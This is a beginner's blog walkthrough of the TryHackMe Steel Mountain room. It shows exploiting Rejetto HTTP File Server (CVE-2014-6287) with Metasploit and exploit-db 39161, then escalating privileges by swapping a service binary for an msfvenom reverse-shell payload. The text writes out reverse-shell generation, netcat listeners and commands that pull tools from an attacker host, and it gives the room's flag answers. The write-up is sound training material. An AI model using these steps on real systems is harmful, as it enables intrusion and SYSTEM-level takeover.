Welcome! It is time to look at the final CTF-like room on the Complete Beginner path of THM. This room is called Steel Mountain and I am exited to look at it since it is a Windows machine which has not been covered so much. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
![Steel Mountain](https://www.jalblas.com/wp-content/uploads/2024/12/Udklip.png)
Steel Mountain CTF
Room URL: https://tryhackme.com/room/steelmountain
Task 1 (Introduction)
In this Steel Mountain room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
Questions
Deploy the machine. Who is the employee of the month?
As always, start with some nmap port scanning. I use the following command for this:
nmap -sV -sC -oN nmap.out -p- <target ip>
This provides version scanning, runs some basic scripts, scans all the ports, and writes the output to a file called nmap.out. We get the following results:
![](https://cdn-images-1.medium.com/max/800/1*rZYXEcLgFFAthuMoTk-c7w.png)
And more:
![](https://cdn-images-1.medium.com/max/800/1*3I9bOxojpUlvP0mHUaA0Jg.png)
There is a bunch of interesting stuff here. We have a website running on port 80, RPC, SMB using port 139 and 445) and then some more HTTP related services on 5985, 8080 and 47001. Finally, there is the SSL service running on 3389, which encrypts RDP sessions.
Let’s have a look at the website first! Visit the ip address on port 80.
![](https://cdn-images-1.medium.com/max/800/1*Qqps5dI30dcdlhi_xFyraw.png)
Hmm, the employee of the month. But what about his name?
Let’s have a look at the source code:
![](https://cdn-images-1.medium.com/max/800/1*n64_KH51I-Leik6S7hzQgA.png)
The image is called BillHarper.png so I am going to guess that’s his name! 😉
Answer: Bill Harper
Task 2 (Initial Access)
Now you have deployed the machine, lets get an initial shell!
Questions
Scan the machine with nmap. What is the other port running a web server on?
Well, we already port scanned in the previous section so we can start answer these questions 🙂
From our nmap scan we can see that there is also a HTTP FileServer (version 2.3) running on port 8080:
![](https://cdn-images-1.medium.com/max/800/1*cKxZWgd_5CRNuXaFU5V5zg.png)
Answer: 8080
Take a look at the other web server. What file server is running?
On the above screenshot we can find the following:
![](https://cdn-images-1.medium.com/max/800/1*ST5mZ3d9b5K-xMEh97eTpw.png)
HttpFileServer is not the answer though. Let’s click on that link:
![](https://cdn-images-1.medium.com/max/800/1*bZu-uuKUcV3mWfBm5hzw2g.png)
The developer is called Rejetto, and after some trial and error I figured out the answer.
Answer: Rejetto HTTP File Server.
What is the CVE number to exploit this file server?
We know the name of the file version, and that it is running version 2.3. We can therefore use the searchsploit command (or look at exploitdb’s website). I entered the following command:
searchsploit http file server -w
This gave me the following results. Note I used the -w flag to get a link to exploit-db.
![](https://cdn-images-1.medium.com/max/800/1*yHU40BgvNTPPMtTiToenqA.png)
Of you look carefully you can see that there are are at least two exploits for version 2.3.x. Let’s try the Remote Command Execution (1) at the following link:
On this page it mentions a CVE number, which is correct!
Answer: 2014–6287
Use Metasploit to get an initial shell. What is the user flag?
Startup Metasploit by running msfconsole.
The great thing about Metasploit is that we can search on CVE number. Let’s do this by running:
search 2014–6287
![](https://cdn-images-1.medium.com/max/800/1*Bie8FF_CWIPdV7C3-ETMeg.png)
We can follow this by entering use 0. This select the module.
To see the different options we need to adjust we can run show options.
![](https://cdn-images-1.medium.com/max/800/1*xDRprfaaAFr-g8uKOXwPrg.png)
A lot of this is already set to defaults, so the only options we have to set are RHOSTS, which means the target host ip address, and RPORT. You can set it using set RHOSTS <ip>.
Now all we need to do is enter run or exploit.
We got access to a meterpreter shell:
![](https://cdn-images-1.medium.com/max/800/1*JwKUTcWoNJbSI86R5-DNEQ.png)
Now we need to find the user flag.
We can use the following command to search for all txt files:
search -f *.txt
This gives us the following result:
![](https://cdn-images-1.medium.com/max/800/1*pv0SKzPCRCpbnVxER7s5LA.png)
Now all we need to do is read the file.
![](https://cdn-images-1.medium.com/max/800/1*73H2NIkxyTCcnpp-idAmdw.png)
Remember too use forward slashes.
Answer: b04763b6fcf51fcd7c13abc7db4fd365
Task 3 (Privilege Escalation)
Now that you have an initial shell on this Windows machine as Bill (enter getuid in the meterpreter shell to see this), we can further enumerate the machine and escalate our privileges to root!
Questions
To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.” You can download the script here.
Now you can use the upload command in Metasploit to upload the script. To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:
![](https://cdn-images-1.medium.com/max/800/1*w_f-rZcwI_xF_ZGQ3o4KCA.png)
After doing this you just have to run the PowerUp Powershell script by entering:
. .\PowerUp.ps1
Followed by:
Invoke-AllChecks
This gives a long list with abnormalities:
![](https://cdn-images-1.medium.com/max/800/1*pyeRZJWCnxBd9LD5Yv_6xQ.png)
Answer: No answer needed
Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
The name is found at the top.
Answer: AdvancedSystemCareService9
The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
Use msfvenom to generate a reverse shell as an Windows executable.
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o
ASCService.exe
Now we generated a reverse shell with the name ASCService.exe.
We can now leave the Powershell shell, and use the same upload command as before:
![](https://cdn-images-1.medium.com/max/800/1*m9GHxYBZB5uXiHBCl-zw8A.png)
No we need to replace the legitimate one. Enter a regular cmd shell from your meterpreter shell by entering: shell.
Before copying, we need to stop the service by entering:
sc stop AdvancedSystemCareService9
![](https://cdn-images-1.medium.com/max/800/1*itVelXaFC_R3YoyOCyp-Og.png)
Then copy the file to the original location:
copy ASCService C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
![](https://cdn-images-1.medium.com/max/800/1*Zbj6Y-zTAI9-gr1BMw3T0A.png)
Now we need to start a listener!
nc -lvnp 4443
Then restart the program to get a shell as root.
sc start AdvancedSystemCareService9
![](https://cdn-images-1.medium.com/max/800/1*XqIb1RV955hFqrqBmgvutg.png)
And we have system access!
![](https://cdn-images-1.medium.com/max/800/1*1ZevOhWd2iD-nkAh39AcOA.png)
Answer: No answer needed
What is the root flag?
You can find the root flag on the Administrators Desktop:
![](https://cdn-images-1.medium.com/max/800/1*3PfoWCjDRdD3vSz9MxO26w.png)
Answer: 9af5f314f57607c00fd09803a587db80
Task 4 (Access and Escalation Without Metasploit)
Now it is time to use the following exploit without the use of Metasploit:https://www.exploit-db.com/exploits/39161
Questions
To begin we shall be using the same CVE. However, this time let’s use this exploit. *Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*
To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!
You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!
Let’s go over the process:
- Download the exploit
Copy the raw text from:
https://www.exploit-db.com/raw/39161
and create it into a new file. I called it exploit.py. - Edit the port/ip in the script
Edit the script and add your attacker machine ip. You can leave the ip as is if you want. - Edit the port number in the script for the file server
The payload script uses port 80 for the file web server by default. This port is often used on THM AttackBoxes and we can therefore not use it for the web server we run in step 5. We therefore add port 8000 to the ip_addr variable. See image below step 8. - Download a netcat static binary
Download the netcat binary here:
https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
It need to be renamed to nc.exe to work with the exploit script. - Serve the binary by running a Python webserver
In the directory where you have your binary running start a simple Python web server by running: python3 -m http.server 8000 - Start a listener
Start a simply netcat listener by entering nc -lvnp 443 - Run the exploit with the correct arguments
Run this command: python2 exploit.py 10.10.13.114 8080
This script will not work without editing with python3. - Run the exploit once more
![](https://cdn-images-1.medium.com/max/800/1*JxStn3P7MieLeaoSyT380w.png)
If you have done everything right you have 3 terminal tabs open. One running the exploit, one running the python http server, and one running the netcat listener.
Answer: No answer needed
![](https://cdn-images-1.medium.com/max/800/1*W5RN_eKfzFoT_DYogX22ng.png)
Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.
Now download a winPEAS binary (https://github.com/carlospolop/PEASS-ng/releases/tag/20220717) and host the Python server once more. Change directory to bill’s desktop (see below). Then we can execute the following command on the Powershell shell:
powershell -c wget "http://<attacker ip>:8000/winPEAS.exe" -outfile "winPEAS.exe"
![](https://cdn-images-1.medium.com/max/800/1*gYgqwyLoaiajvEpcaidveQ.png)
Once we run winPeas (simply write winPeas.exe), we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.
![](https://cdn-images-1.medium.com/max/800/1*aqWv1cWvqLpRhDM9hK9L1A.png)
We see the same vulnerability as we did when we used Metasploit!
What powershell -c command could we run to manually find out the service name? *Format is “powershell -c “command here”*
Answer: powershell -c Get-Service
Now let’s escalate to Administrator with our new found knowledge. Generate your payload using msfvenom and pull it to the system using powershell.
I am leaving this to you as the process is very similar as when we used Metaspoloit!
Answer: No answer needed
Wow, we are done with Steel Mountain!
Task 3 and task 4 were quite tricky in my opinion, but I have tried to explain the concepts as well as I could. I got a lot more knowledge and I hope you can say the same. Anyway, I’m out! Please send a few claps if you don’t mind 🙂